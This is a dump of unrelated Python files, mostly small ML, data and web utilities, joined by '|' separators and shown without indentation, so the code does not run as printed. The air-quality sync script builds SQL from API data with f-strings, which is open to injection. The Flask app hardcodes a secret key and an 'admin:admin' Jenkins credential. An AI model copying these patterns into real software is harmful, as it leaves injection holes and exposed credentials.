parser.add_argument("-ext_ff_size", default=2048, type=int)
parser.add_argument("-label_smoothing", default=0.1, type=float)
parser.add_argument("-generator_shard_size", default=32, type=int)
parser.add_argument("-alpha", default=0.6, type=float)
parser.add_argument("-beam_size", default=5, type=int)
parser.add_argument("-min_length", default=15, type=int)
parser.add_argument("-max_length", default=150, type=int)
parser.add_argument("-max_tgt_len", default=140, type=int)
parser.add_argument("-param_init", default=0, type=float)
parser.add_argument("-param_init_glorot", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-optim", default='adam', type=str)
parser.add_argument("-lr", default=1, type=float)
parser.add_argument("-beta1", default= 0.9, type=float)
parser.add_argument("-beta2", default=0.999, type=float)
parser.add_argument("-warmup_steps", default=8000, type=int)
parser.add_argument("-warmup_steps_bert", default=8000, type=int)
parser.add_argument("-warmup_steps_dec", default=8000, type=int)
parser.add_argument("-max_grad_norm", default=0, type=float)
parser.add_argument("-save_checkpoint_steps", default=5, type=int)
parser.add_argument("-accum_count", default=1, type=int)
parser.add_argument("-report_every", default=1, type=int)
parser.add_argument("-train_steps", default=1000, type=int)
parser.add_argument("-recall_eval", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument('-visible_gpus', default='-1', type=str)
parser.add_argument('-gpu_ranks', default='0', type=str)
parser.add_argument('-log_file', default='./run/logs/cnndm.log')
parser.add_argument('-seed', default=666, type=int)
parser.add_argument("-test_all", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-test_from", default='')
parser.add_argument("-test_start_from", default=-1, type=int)
parser.add_argument("-train_from", default='')
parser.add_argument("-captioning_dataset_path", default='./data/captioning_dataset.json', type=str)
parser.add_argument("-articles_metadata", default='./data/all_articles.pkl', type=str)
parser.add_argument("-fake_articles", default='./data/articles_out.jsonl', type=str)
parser.add_argument("-image_representations_dir", default='./data/images/object_representations', type=str)
parser.add_argument("-real_articles_dir", default='./data/real_arts/bert_data/', type=str)
parser.add_argument("-fake_articles_dir", default='./data/fake_arts/bert_data/', type=str)
parser.add_argument("-real_captions_dir", default='./data/real_caps/bert_data/', type=str)
parser.add_argument("-ner_dir", default='./data/named_entities/', type=str)
parser.add_argument("-model_dir", default='./data/models/')
parser.add_argument("-num_workers", default=4, type=int)
parser.add_argument("-test_with", default='fake-real', type=str)
parser.add_argument("-is_train", default='False', type=str)
args = parser.parse_args()
args.gpu_ranks = [int(i) for i in range(len(args.visible_gpus.split(',')))]
args.world_size = len(args.gpu_ranks)
args.cuda = torch.cuda.is_available()
# This command should be placed before importing torch.
# os.environ["CUDA_VISIBLE_DEVICES"] = args.visible_gpus
kwargs = {'num_workers': args.num_workers, 'pin_memory': True} if args.cuda else {}
if args.cuda:
torch.cuda.manual_seed(args.seed)
captioning_dataset = json.load(open(args.captioning_dataset_path, "rb"))
all_arts = pickle.load(open(args.articles_metadata, 'rb'))
art2id = {}
# ipdb.set_trace()
for i, art in enumerate(all_arts):
art2id[art] = i
p = open(args.fake_articles, 'r')
fake_articles = [json.loads(l) for i, l in enumerate(p)]
train_loader = DataLoader(Loader(args, 'train', captioning_dataset, art2id, fake_articles), batch_size=args.batch_size, shuffle=True, collate_fn=collate)
val_loader = DataLoader(Loader(args, 'valid', captioning_dataset, art2id, fake_articles), batch_size=args.batch_size, shuffle=False, collate_fn=collate, **kwargs)
test_loader = DataLoader(Loader(args, 'test', captioning_dataset, art2id, fake_articles), batch_size=args.batch_size, shuffle=False, collate_fn=collate, **kwargs)
device = 'cuda'
bert_from_extractive = None
model = Model(args, device, None, bert_from_extractive)
model = nn.DataParallel(model)
model.cuda()
parameters = filter(lambda p: p.requires_grad, model.parameters())
opt = optim.Adam(parameters, lr=args.lr, betas=(args.beta1, args.beta2))
check_pt_path = os.path.join(args.model_dir, args.test_with + '_check_pt.pth')
model_best_path = os.path.join(args.model_dir, args.test_with + '_model_best.pth')
if not os.path.exists(args.model_dir):
os.makedirs(args.model_dir)
# Training
if str2bool(args.is_train):
val_acc = None
for epoch in range(10):
train(train_loader, model, opt, args.log_interval, epoch)
acc = test(val_loader, model)
print('')
print('val accuracy: ' + str(acc * 100.))
torch.save(model.state_dict(), check_pt_path)
if val_acc is None or acc > val_acc:
val_acc = acc
torch.save(model.state_dict(), model_best_path)
print('')
# Testing
print('*Test with ', args.test_with)
# print('valid accuracy: ' + str(val_acc * 100.))
if not os.path.exists(model_best_path):
print('No such files: ' + model_best_path)
sys.exit(0)
else:
model.load_state_dict(torch.load(model_best_path))
acc = test(test_loader, model)
print('test accuracy: ' + str(acc * 100.))
|
import requests
import psycopg2
import psycopg2.extras
import urllib.parse as urlparse
import os
from lotify.client import Client
URL = urlparse.urlparse(os.getenv('DATABASE_URL'))
DB_NAME = URL.path[1:]
USER = URL.username
PASSWORD = URL.password
HOST = URL.hostname
PORT = URL.port
class Database:
conns = []
def __enter__(self):
return self
def connect(self):
conn = psycopg2.connect(
dbname=DB_NAME,
user=USER,
password=PASSWORD,
host=HOST,
port=PORT
)
self.conns.append(conn)
return conn
def __exit__(self, type, value, traceback):
for conn in self.conns:
conn.close()
self.conns.clear()
print('Check tables status...')
try:
with Database() as db, db.connect() as conn, conn.cursor(
cursor_factory=psycopg2.extras.RealDictCursor) as cur:
cur.execute(f'''
CREATE TABLE public.taiwan
(
site_name character varying(20) COLLATE pg_catalog."default" NOT NULL,
county character varying(20) COLLATE pg_catalog."default",
aqi character varying(10) COLLATE pg_catalog."default" DEFAULT 0,
status character varying(15) COLLATE pg_catalog."default",
update_time character varying(20) COLLATE pg_catalog."default",
CONSTRAINT taiwan_pkey PRIMARY KEY (site_name)
);
CREATE TABLE public.user_site
(
line_id character varying(50) COLLATE pg_catalog."default",
site_name character varying(20) COLLATE pg_catalog."default",
CONSTRAINT site UNIQUE (site_name)
);
CREATE TABLE public."user"
(
line_id character varying(50) COLLATE pg_catalog."default" NOT NULL,
notify_token character varying(100) COLLATE pg_catalog."default" NOT NULL,
CONSTRAINT user_pkey PRIMARY KEY (line_id)
)
TABLESPACE pg_default;
ALTER TABLE public.taiwan
OWNER to {USER};
ALTER TABLE public."user"
OWNER to {USER};
ALTER TABLE public.user_site
OWNER to {USER};
''')
conn.commit()
except psycopg2.errors.DuplicateTable:
print('Tables have been create.')
pass
except Exception as e:
raise Exception(e)
print('Search data......')
air_data = requests.get(
'http://opendata.epa.gov.tw/webapi/Data/REWIQA/?$orderby=SiteName&$skip=0&$top=1000&format=json')
airs = air_data.json()
if airs:
print("Get data success")
print("Connecting...")
print("Sync date to DB!!")
with Database() as db, db.connect() as conn, conn.cursor(
cursor_factory=psycopg2.extras.RealDictCursor) as cur:
for air in airs:
cur.execute(f'''
INSERT INTO taiwan (site_name, county, aqi, status, update_time)
VALUES (
'{air.get('SiteName')}',
'{air.get('County')}',
'{air.get('AQI')}',
'{air.get('Status')}',
'{air.get('PublishTime')}'
) ON CONFLICT ON CONSTRAINT taiwan_pkey
DO UPDATE SET
county = '{air.get('County')}',
aqi = '{air.get('AQI')}',
status = '{air.get('Status')}',
update_time = '{air.get('PublishTime')}'
''')
conn.commit()
print("Closing...Bye")
|
"""Compose. A command line utility for making React.js componets.
Composes helps you to create the structure for a React.js component,
following the View-Actions-index pattern.
"""
import argparse
import os.path
import re
import sys
from pathlib import Path
from typing import Dict, TextIO
INDEX = """\
import React from 'react'
import PropTypes from 'prop-types'
import Actions, {{ actionPropTypes }} from './Actions'
import View from './View'
const {name} = (props) => (
<View {{...props}} {{...Actions(props)}} />
)
const propTypes = {{ }}
{name}.displayName = '{name}'
{name}.propTypes = propTypes
View.propTypes = {{
...propTypes,
...actionPropTypes,
}}
export default {name}
"""
SIMPLE_INDEX = """\
import React from 'react'
import PropTypes from 'prop-types'
import styles from './styles.module.css'
const {name} = (props) => (
<></>
)
{name}.displayName = '{name}'
{name}.propTypes = {{ }}
export default {name}
"""
VIEW = """\
import React from 'react'
import styles from './styles.module.css'
const View = (props) => (
<>
</>
)
View.displayName = '{name}/View'
export default View
"""
ACTIONS = """\
import React from 'react'
import PropTypes from 'prop-types'
const Actions = (props) => {{ }}
export const actionPropTypes = {{ }}
export default Actions
"""
def make_args_parser():
parser = argparse.ArgumentParser(prog='compose', description=__doc__)
parser.add_argument('dir',
nargs='?',
type=Path,
default='.',
help='Directorio donde se creará el componente.')
parser.add_argument('component_name',
help='Nombre del componente creado.')
parser.add_argument('-y',
'--yes',
dest='skip_confirm',
action='store_true',
help='Saltarse confirmación. (Sí a todo)')
parser.add_argument('-s',
'--simple',
action='store_true',
help='Crear componente sin Actions ni View.')
return parser
def confirm(prompt: str, true_value: str) -> bool:
return input(prompt).casefold() == true_value.casefold()
def is_component_name(name: str) -> bool:
return re.match(r'^[A-Z][\w]*$', name) is not None
def render_template(file: TextIO, template: str, **context):
file.write(template.format(**context))
def make_component(name: str, base: Path, file_template_mapping: Dict[str,
str]):
root: Path = base / name
if not root.exists():
root.mkdir(parents=True)
context = {'name': name}
for path, template in file_template_mapping.items():
item_path: Path = root / path
with item_path.open('w') as file:
render_template(file, template, **context)
def get_templates(simple=False):
if simple:
return {'index.js': SIMPLE_INDEX, 'styles.module.css': ''}
return {
'index.js': INDEX,
'Actions.js': ACTIONS,
'View.js': VIEW,
'styles.module.css': '',
}
def main():
args = make_args_parser().parse_args()
base_path: Path = args.dir
component_name: str = args.component_name
if not is_component_name(component_name):
print(
'Error: El nombre del componente debe comenzar '
'en una letra mayúscula y no debe contener espacios.',
file=sys.stderr)
sys.exit(1)
templates = get_templates(simple=args.simple)
print('Esta operación resultará en el siguiente arbol de archivos:\n',
f'{base_path / component_name}{os.path.sep}')
def print_tree(filenames):
*filenames, last_filename= filenames
for filename in filenames:
print(f' |---- {filename}')
print(f' \\---- {last_filename}')
print_tree(templates.keys())
print('Si alguno de estos archivos ya existe, serán sobreescritos.')
if not args.skip_confirm and not confirm('¿Desea continuar? (s/n) ', 's'):
print('Operación cancelada.')
sys.exit(0)
make_component(component_name, base_path, templates)
print('Operación realizada exitosamente.')
if __name__ == '__main__':
main()
|
import argparse
import cv_generator.themes
import logging
import os
import random
# Create the ArgumentParse and parse the arguments inside `args`
parser = argparse.ArgumentParser(description='Run CV Generator')
parser.add_argument('--cv-file', required=True, help='Relative or absolute path to the raw .json or .yaml resume file')
# parser.add_argument('--theme', choices=['sitges', 'developer'], help='Name of the theme of the generated resume')
parser.add_argument('--filename', required=False, type=str, help='Generated file name, without extension')
parser.add_argument('--keep-tex', action='store_true', help='Keep LaTeX files used to generate the resume')
args = parser.parse_args()
# Define required files and folders
base_path = os.path.dirname(os.path.dirname(__file__))
cv_schema_path = os.path.join(base_path, 'cv.schema.json')
# Create a logging.Logger object to be used in the execution
logging.basicConfig(level=logging.INFO, format='%(asctime)s - [%(levelname)s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger('cv_generator')
logger.propagate = True
# Create a new CV object with the data provided in the --cv-file argument
cv = cv_generator.CV(logger).load(args.cv_file, cv_schema_path)
# Get the child class of cv_generator.themes.BaseTheme to use
themes_dict = {
'developer': cv_generator.themes.ThemeDeveloper,
# 'sitges': cv_generator.themes.ThemeSitges
}
theme = themes_dict['developer'](cv, logger)
# Define the name (and path) of the generated file random.randint(1, 10E6)
file_name = args.filename if args.filename else '{}-{}'.format(theme.theme_name, random.randint(1, 1E6))
file_path = os.path.join(base_path, 'generated_documents') + os.sep + '{}'.format(file_name)
# Save the generated document in generated_file_path
theme.save(file_path, args.keep_tex)
logger.info('File {}.pdf generated inside /generated_documents'.format(file_name))
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import re
class Autoconf(AutotoolsPackage, GNUMirrorPackage):
"""Autoconf -- system configuration part of autotools"""
homepage = 'https://www.gnu.org/software/autoconf/'
gnu_mirror_path = 'autoconf/autoconf-2.69.tar.gz'
version('2.71', sha256='431075ad0bf529ef13cb41e9042c542381103e80015686222b8a9d4abef42a1c')
version('2.70', sha256='f05f410fda74323ada4bdc4610db37f8dbd556602ba65bc843edb4d4d4a1b2b7')
version('2.69', sha256='954bd69b391edc12d6a4a51a2dd1476543da5c6bbf05a95b59dc0dd6fd4c2969',
preferred=True)
version('2.62', sha256='83aa747e6443def0ebd1882509c53f5a2133f502ddefa21b3de141c433914bdd')
version('2.59', sha256='9cd05c73c5fcb1f5ccae53dd6cac36bb8cb9c7b3e97ffae5a7c05c72594c88d8')
# https://savannah.gnu.org/support/?110396
patch('https://git.savannah.gnu.org/cgit/autoconf.git/patch/?id=05972f49ee632cd98057a3caf82ebfb9574846da',
sha256='eaa3f69d927a853313a0b06e2117c51adab6377a2278549b05abc5df93643e16',
when='@2.70')
# Apply long-time released and already in-use upstream patches to fix test cases:
# tests/foreign.at (Libtool): Be tolerant of 'quote' replacing the older `quote'
patch('http://mirrors.mit.edu/gentoo-portage/sys-devel/autoconf/files/autoconf-2.69-fix-libtool-test.patch',
sha256='7793209b33013dc0f81208718c68440c5aae80e7a1c4b8d336e382525af791a7',
when='@2.69')
# Fix bin/autoscan.in for current perl releases (reported already in January 2013)
patch('http://mirrors.mit.edu/gentoo-portage/sys-devel/autoconf/files/autoconf-2.69-perl-5.26.patch',
sha256='35c449281546376449766f92d49fc121ca50e330e60fefcfc9be2af3253082c2',
when='@2.62:2.69 ^perl@5.17:')
# Fix bin/autoheader.in for current perl relases not having "." in @INC:
patch('http://mirrors.mit.edu/gentoo-portage/sys-devel/autoconf/files/autoconf-2.69-perl-5.26-2.patch',
sha256='a49dd5bac3b62daa0ff688ab4d508d71dbd2f4f8d7e2a02321926346161bf3ee',
when='@2.62:2.69 ^perl@5.17:')
# Note: m4 is not a pure build-time dependency of autoconf. m4 is
# needed when autoconf runs, not only when autoconf is built.
depends_on('m4@1.4.6:', type=('build', 'run'))
depends_on('perl', type=('build', 'run'))
build_directory = 'spack-build'
tags = ['build-tools']
executables = [
'^autoconf$', '^autoheader$', '^autom4te$', '^autoreconf$',
'^autoscan$', '^autoupdate$', '^ifnames$'
]
@classmethod
def determine_version(cls, exe):
output = Executable(exe)('--version', output=str, error=str)
match = re.search(r'\(GNU Autoconf\)\s+(\S+)', output)
return match.group(1) if match else None
def patch(self):
# The full perl shebang might be too long; we have to fix this here
# because autom4te is called during the build
patched_file = 'bin/autom4te.in'
# We save and restore the modification timestamp of the file to prevent
# regeneration of the respective man page:
with keep_modification_time(patched_file):
filter_file('^#! @PERL@ -w',
'#! /usr/bin/env perl',
patched_file)
if self.version == Version('2.62'):
# skip help2man for patched autoheader.in and autoscan.in
touch('man/autoheader.1')
touch('man/autoscan.1')
# make installcheck would execute the testsuite a 2nd time, skip it
def installcheck(self):
pass
@run_after('install')
def filter_sbang(self):
# We have to do this after install because otherwise the install
# target will try to rebuild the binaries (filter_file updates the
# timestamps)
# Revert sbang, so Spack's sbang hook can fix it up
filter_file('^#! /usr/bin/env perl',
'#! {0} -w'.format(self.spec['perl'].command.path),
self.prefix.bin.autom4te,
backup=False)
def _make_executable(self, name):
return Executable(join_path(self.prefix.bin, name))
def setup_dependent_package(self, module, dependent_spec):
# Autoconf is very likely to be a build dependency,
# so we add the tools it provides to the dependent module
executables = ['autoconf',
'autoheader',
'autom4te',
'autoreconf',
'autoscan',
'autoupdate',
'ifnames']
for name in executables:
setattr(module, name, self._make_executable(name))
|
from xmlrpc.client import ServerProxy
url = "http://localhost:8080"
proxy = ServerProxy(url)
# text = u"This is my home"
# params = {"text":text, "align":"false", "report-all-factors":"false"}
#
# result = proxy.translate(params)
#
# print result['text']
#
# if 'id' in result:
# print "Segment ID:%s" % (result['id'])
#
# if 'align' in result:
# print "Phrase alignments:"
# aligns = result['align']
# for align in aligns:
# print "%s,%s,%s" %(align['tgt-start'], align['src-start'], align['src-end'])
def translate_text(data):
text_to_translate = data["text"]
params = {"text": text_to_translate, "align": "false", "report-all-factors": "false"}
result = proxy.translate(params)
response_object = {
'status': 'success',
'message': 'Successfully Translated.',
'Translation': result['text']
}
return response_object, 200
|
#!/usr/bin/env python
from functools import wraps
import types
import json
from flask import Flask, request, Blueprint, _request_ctx_stack
from flask_sqlalchemy import SQLAlchemy
from flask_security import Security, SQLAlchemyUserDatastore, UserMixin, RoleMixin, current_user
from flask_principal import identity_changed, Identity
from flask_restful import Api, Resource
from jenkins import JenkinsHelper
app = Flask(__name__)
app.config['DEBUG'] = True
app.config['SECRET_KEY'] = 'forgetme'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite://'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
_unauthenticated_response = json.dumps({'message': 'You must authenticate to perform this request'}), 401, {'Content-Type': 'application/json', 'WWW-Authenticate': 'Token realm="flask"'}
_unauthorized_repsonse = json.dumps({'message': 'You are not authorized to perform this request'}), 401, {'Content-Type': 'application/json', 'WWW-Authenticate': 'Token realm="flask"'}
_forbidden_response = json.dumps({'message': 'You are not authorized to perform this request'}), 403, {'Content-Type': 'application/json'}
#
# UserDataStore Setup
#
db = SQLAlchemy(app)
roles_users = db.Table('roles_users',
db.Column('user_id', db.Integer(), db.ForeignKey('user.id')),
db.Column('role_id', db.Integer(), db.ForeignKey('role.id'))
)
class Role(db.Model, RoleMixin):
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(80), unique=True)
description = db.Column(db.String(255))
class User(db.Model, UserMixin):
id = db.Column(db.Integer(), primary_key=True)
api_key = db.Column(db.String(255), unique=True)
name = db.Column(db.String(50))
active = db.Column(db.Boolean())
roles = db.relationship('Role', secondary=roles_users, backref=db.backref('users', lazy='dynamic'))
user_datastore = SQLAlchemyUserDatastore(db, User, Role)
security = Security(app, user_datastore)
@app.before_first_request
def create_realm():
db.create_all()
b = user_datastore.create_user(api_key='bobby', name='Bobby')
f = user_datastore.create_user(api_key='freddie', name='Freddie')
t = user_datastore.create_user(api_key='tommy', name='Tommy')
a = user_datastore.create_role(name='admin')
u = user_datastore.create_role(name='user')
user_datastore.add_role_to_user(b, a)
user_datastore.add_role_to_user(b, u)
user_datastore.add_role_to_user(f, u)
db.session.commit()
#
# Security Setup
#
user_bp = Blueprint('user_bp', __name__)
@app.before_request
def authenticate():
token = request.headers.get('Authorization')
if token:
user = User.query.filter_by(api_key=token).first()
if user:
# Hijack Flask-Login to set current_user
_request_ctx_stack.top.user = user
identity_changed.send(app, identity=Identity(user.id))
else:
return _unauthorized_repsonse
else:
return _unauthenticated_response
def authorize(role):
if not current_user.is_authenticated:
return _unauthenticated_response
if not current_user.has_role(role):
return _forbidden_response
return None
@user_bp.before_request
def authorize_user():
return authorize('user')
#
# API Resources
#
class Echo(Resource):
def put(self):
jh = JenkinsHelper('YWRtaW46YWRtaW4=')
queue = jh.build('echo')
if not queue is None:
return {'job': queue}, {'Content-Type': 'application/json'}
else:
return {'message': 'Failed to launch a job'}, 500
class Job(Resource):
def get(self, id):
jh = JenkinsHelper('YWRtaW46YWRtaW4=')
return {'status': jh.status(id)}
#
# API Endpoints
#
user_api = Api(user_bp)
user_api.add_resource(Echo, '/echo')
user_api.add_resource(Job, '/job/<id>')
#
# Run Flask
#
app.register_blueprint(user_bp)
if __name__ == '__main__':
app.run()
|
import pickle
import pandas as pd
from os import path
from scripts.config import params
from scripts.assemble_web_data import percentile, rescale_tsne
def assemble_web_data(raw_dir, processed_dir):
with open(path.join(processed_dir, 'x2i.pickle'), 'rb') as handle:
x2i = pickle.load(handle)
tsne_emb = pd.read_csv(path.join(processed_dir, 'tsne_emb.csv'))
tsne_emb = rescale_tsne(tsne_emb)
with open(path.join(processed_dir, 'recommendations.pickle'), 'rb') as handle:
recommendations = pickle.load(handle)
movies = pd.read_csv(path.join(raw_dir, 'movies.csv'))
links = pd.read_csv(path.join(raw_dir, 'links.csv'))
tags = pd.read_csv(path.join(raw_dir, 'genome-tags.csv'))
tag_score = pd.read_csv(path.join(raw_dir, 'genome-scores.csv'))
raw_ratings = pd.read_csv(path.join(raw_dir, 'ratings.csv'))
tags = tag_score.merge(tags, on='tagId')
tags = tags.groupby('movieId').apply(lambda x: ', '.join(
[y.tag for y in x.sort_values('relevance', ascending=False).iloc[:10, :].itertuples()]))
movies = movies.merge(links, on='movieId', how='outer')
movies = {x.movieId: (x.title, x.genres, x.imdbId)
for x in movies.itertuples()}
ds = pd.read_csv(path.join(processed_dir, 'ds.csv'))
freq = ds.groupby('item')['user'].count()
freq_pct = percentile(freq)
agr = raw_ratings.groupby('movieId')['rating'].mean().reset_index()
agr['movieId'] = agr['movieId'].apply(
lambda x: x2i[x] if x in x2i else None)
agr = agr[agr['movieId'].notna()].reset_index(drop=True)
agr.sort_values('movieId')
avg_rating = agr['rating']
avg_rating_pct = percentile(avg_rating)
i2x = {v: k for k, v in x2i.items()}
nmovies = len(x2i)
web = pd.DataFrame({'idx': [*range(nmovies)],
'x': tsne_emb['x'][:-1],
'y': tsne_emb['y'][:-1],
't_name': [movies[i2x[i]][0] for i in range(nmovies)],
't_genres': [', '.join(movies[i2x[i]][1].split('|')) for i in range(nmovies)],
't_tags': [tags.at[i2x[i]] if i2x[i] in tags.index else '' for i in range(nmovies)],
'recommend_value': recommendations,
'n_recommend_pct': percentile(pd.Series(recommendations)),
'avg_rating': avg_rating,
'n_avg_rating_pct': avg_rating_pct,
'freq': freq,
'n_freq_pct': freq_pct,
'ml_id': [i2x[i] for i in range(nmovies)],
'imdb_id': [movies[i2x[i]][2] for i in range(nmovies)]})
web.to_csv(path.join(processed_dir, 'web.csv'),
index=False, float_format='%.5f')
if __name__ == '__main__':
common_params = params['ml']['common']
assemble_web_data(common_params['raw_dir'],
common_params['proc_dir'])
|
n, k = list(map(int, input().split()))
time = 240
diff = time-k
t=0
prob = 0
for i in range(1,n+1):
if (t+5*i)<=diff:
t = t+5*i
prob +=1
print(prob)
|
import numpy as np
import logging
from ncon import ncon
from . import umps_mpoevolve
from . import mcmps_mpoevolve_real
from .McMPS import McMPS
from .UMPS import UMPS
version = 1.0
parinfo = {
"mps_chis": {
"default": range(1,31),
"idfunc": lambda dataname, pars: True
},
"ground_umps_chis": {
"default": None,
"idfunc": lambda dataname, pars: (
dataname == "timeevolved_insertion_mcmps"
and pars["ground_umps_chis"]
and not tuple(pars["ground_umps_chis"]) == tuple(pars["mps_chis"])
)
},
"mps_eps": {
"default": 1e-5,
"idfunc": lambda dataname, pars: True
},
"verbosity": {
"default": np.inf,
"idfunc": lambda dataname, pars: False
},
# Generating UMPS ground states.
# TODO See umps_mpoevolve for why these are used here.
"euclideon_spacestep": {
"default": 1,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"euclideon_padding": {
"default": 3,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"euclideon_eps": {
"default": 1e-5,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"euclideon_chis": {
"default": range(1,7),
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"initial_timestep": {
"default": 50,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"min_timestep": {
"default": 1/8,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"timestep_decreasant": {
"default": 0.8,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"max_counter": {
"default": 1000,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"max_subcounter": {
"default": 15,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"entropy_eps": {
"default": 1e-3,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"energy_eps": {
"default": 1e-3,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"spectrum_eps": {
"default": np.inf,
"idfunc": lambda dataname, pars: (
dataname == "umps_groundstate" and pars["spectrum_eps"] < np.inf
)
},
# MPO time evolution
"lorentzion_timestep": {
"default": 0.2,
"idfunc": lambda dataname, pars: dataname == "timeevolved_insertion_mcmps"
},
"lorentzion_spacestep": {
"default": 1,
"idfunc": lambda dataname, pars: dataname == "timeevolved_insertion_mcmps"
},
"lorentzion_padding": {
"default": 3,
"idfunc": lambda dataname, pars: dataname == "timeevolved_insertion_mcmps"
},
"lorentzion_eps": {
"default": 1e-5,
"idfunc": lambda dataname, pars: dataname == "timeevolved_insertion_mcmps"
},
"lorentzion_chis": {
"default": range(1,7),
"idfunc": lambda dataname, pars: dataname == "timeevolved_insertion_mcmps"
},
"insertion_early": {
"default": "z",
"idfunc": lambda dataname, pars: dataname == "timeevolved_insertion_mcmps"
},
"t": {
"default": 0,
"idfunc": lambda dataname, pars: dataname == "timeevolved_insertion_mcmps"
},
"timesmear_sigma": {
"default": 0,
"idfunc": lambda dataname, pars: (
dataname == "timeevolved_insertion_mcmps"
and pars["timesmear_sigma"] != 0
)
},
"timesmear_euclideon_timestep": {
"default": 1e-3,
"idfunc": lambda dataname, pars: (
dataname == "timeevolved_insertion_mcmps"
and pars["timesmear_sigma"] != 0
)
},
"timesmear_euclideon_spacestep": {
"default": 1,
"idfunc": lambda dataname, pars: (
dataname == "timeevolved_insertion_mcmps"
and pars["timesmear_sigma"] != 0
)
},
"timesmear_euclideon_padding": {
"default": 3,
"idfunc": lambda dataname, pars: (
dataname == "timeevolved_insertion_mcmps"
and pars["timesmear_sigma"] != 0
)
},
"timesmear_euclideon_eps": {
"default": 1e-10,
"idfunc": lambda dataname, pars: (
dataname == "timeevolved_insertion_mcmps"
and pars["timesmear_sigma"] != 0
)
},
"timesmear_euclideon_chis": {
"default": range(1,7),
"idfunc": lambda dataname, pars: (
dataname == "timeevolved_insertion_mcmps"
and pars["timesmear_sigma"] != 0
)
},
}
def generate(dataname, *args, pars=dict(), filelogger=None):
infostr = ("{}"
"\nGenerating {} with MPS version {}."
.format("="*70, dataname, version))
logging.info(infostr)
if filelogger is not None:
# Only print the dictionary into the log file, not in stdout.
dictstr = ""
for k,v in sorted(pars.items()):
dictstr += "\n%s = %s"%(k, v)
filelogger.info(dictstr)
if dataname == "umps_groundstate":
res = generate_umps_groundstate(*args, pars=pars)
elif dataname == "timeevolved_insertion_mcmps":
res = generate_timeevolved_insertion_mcmps(*args, pars=pars)
else:
raise ValueError("Unknown dataname: {}".format(dataname))
return res
def generate_umps_groundstate(*args, pars=dict()):
ham = args[0]
res = umps_mpoevolve.optimize_groundstate(ham, pars)
return res
def generate_timeevolved_insertion_mcmps(*args, pars=dict()):
mcmps = args[0]
if type(mcmps) != McMPS:
umps = mcmps
# It's presumably an UMPS, in need of an operator insertion.
# Create a McMPS out of punching an UMPS with op.
op = mcmps_mpoevolve_real.get_operator_insertion(pars["insertion_early"])
op = umps.tensortype().from_ndarray(op)
tensor = umps.tensor
weights = umps.weights
tensor_op = ncon((tensor, op), ([-1,2,-3], [2,-2]))
mcmps = McMPS(umps, tensors=[tensor_op], weightss=[])
if pars["timesmear_sigma"] > 0:
A = args[2][0]
smear_t = 0
while smear_t < pars["timesmear_sigma"]**2/2:
logging.info("Smearing 'time': {}".format(smear_t))
mcmps = mcmps_mpoevolve_real.mpoevolve(mcmps, A, pars)
smear_t += pars["timesmear_euclideon_timestep"]
smear_t = np.around(smear_t, 10)
mcmps.normalize()
mcmps.normfactor /= np.sqrt(2*np.pi)*pars["timesmear_sigma"]
A = args[1][0]
if np.abs(pars["t"]) < 1e-12:
# We are essentially at time zero, no need to time evolve.
return mcmps
res = mcmps_mpoevolve_real.mpoevolve(mcmps, A, pars)
return res
def prereq_pairs(dataname, pars):
if dataname == "umps_groundstate":
res = prereq_pairs_umps_groundstate(pars)
elif dataname == "timeevolved_insertion_mcmps":
res = prereq_pairs_timeevolved_insertion_mcmps(pars)
else:
raise ValueError("Unknown dataname: {}".format(dataname))
return res
def prereq_pairs_umps_groundstate(pars):
prereq_pars = pars.copy()
res = [("ham", prereq_pars)]
return res
def prereq_pairs_timeevolved_insertion_mcmps(pars):
prereq_pars = pars.copy()
prereq_pars["t"] -= prereq_pars["lorentzion_timestep"]
prereq_pars["t"] = np.around(prereq_pars["t"], 10)
if prereq_pars["t"] < 0:
dataname = "umps_groundstate"
if pars["ground_umps_chis"]:
prereq_pars["mps_chis"] = pars["ground_umps_chis"]
else:
dataname = "timeevolved_insertion_mcmps"
complexion_pars = pars.copy()
complexion_pars["complexion_step_direction"] = 1j
complexion_pars["complexion_timestep"] = pars["lorentzion_timestep"]
complexion_pars["complexion_spacestep"] = pars["lorentzion_spacestep"]
complexion_pars["complexion_chis"] = pars["lorentzion_chis"]
complexion_pars["complexion_padding"] = pars["lorentzion_padding"]
complexion_pars["complexion_eps"] = pars["lorentzion_eps"]
complexion_pars["iter_count"] = 0
complexion_pars["model"] = "complexion_" + pars["model"]
res = ((dataname, prereq_pars), ("A", complexion_pars))
if prereq_pars["t"] < 0 and pars["timesmear_sigma"] > 0:
euclideon_pars = pars.copy()
euclideon_pars["complexion_step_direction"] = -1
euclideon_pars["complexion_timestep"] = pars["timesmear_euclideon_timestep"]
euclideon_pars["complexion_spacestep"] = pars["timesmear_euclideon_spacestep"]
euclideon_pars["complexion_chis"] = pars["timesmear_euclideon_chis"]
euclideon_pars["complexion_padding"] = pars["timesmear_euclideon_padding"]
euclideon_pars["complexion_eps"] = pars["timesmear_euclideon_eps"]
euclideon_pars["iter_count"] = 0
euclideon_pars["model"] = "complexion_sq_" + pars["model"]
res += (("A", euclideon_pars),)
return res
|
import lpaste.lpaste
__name__ == '__main__' and lpaste.lpaste.main()
|
class Solution(object):
def containsDuplicate(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
table = set()
for num in nums:
if num in table:
return True
else:
table.add(num)
return False
|
from aapt2 import aapt
def test_version():
print(aapt.version())
def test_pkg_info():
print(aapt.get_apk_info("$HOME/Downloads/zzt.apk"))
